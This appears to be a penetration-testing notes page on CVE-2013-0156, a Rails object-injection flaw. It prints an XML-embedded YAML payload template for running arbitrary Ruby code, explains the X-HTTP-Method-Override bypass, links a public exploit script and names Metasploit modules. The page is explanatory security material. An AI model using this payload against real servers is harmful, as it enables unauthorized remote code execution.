cve-2013-0156-rails-object-injection

CVE-2013-0156: Rails Object Injection

This vulnerability is caused by an arbitrary deserialization that can be used to trigger a SQL injection and even a code execution.

Exploitation

Multiple public exploits are available for this vulnerability.

info

For example, the one located here can be used. Python Alternatives: https://raw.githubusercontent.com/am0nsec/exploit/refs/heads/master/ruby/cve-2013-0156/cve-2013-0156.py

This exploit will generate a payload similar to the following request body:

&#x3C;?xml version="1.0" encoding="UTF-8"?>
&#x3C;exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? |
  foo
<strong>  (RUBY; @executed = true) unless @executed
</strong>  __END__
: !ruby/struct
  defaults:
    :action: create
    :controller: foos
  required_parts: []
  requirements:
    :action: create
    :controller: foos
  segment_keys:
    - :format&#x3C;/exploit>

info

Where RUBY is some arbitrary Ruby code.

The idea here is to create a new action with an arbitrary code in it. By default, Rails doesn't support pure Yaml in a request body. But it supports XML that can embed YAML within it (this explains the first two lines of the payload). Finally, the @executed is used to ensure that the code is only run once.

YAML is very sensitive to line-breaks and whitespaces. Here we can see that the YAML is used to run some Ruby code.

The application only contains one route that uses the GET method. However, the request needs to contain a body for the payload. To bypass this limitation, the header X-HTTP-Method-Override can be used. The provided exploit will do this automatically. You just need to find the right Ruby code to gain code execution.

Metasploit

We can use metasploit to exploit this vulnerability:

auxiliary/scanner/http/rails_xml_yaml_scanner can be used for detection.
exploit/multi/http/rails_xml_yaml_code_exec can be used for exploitation.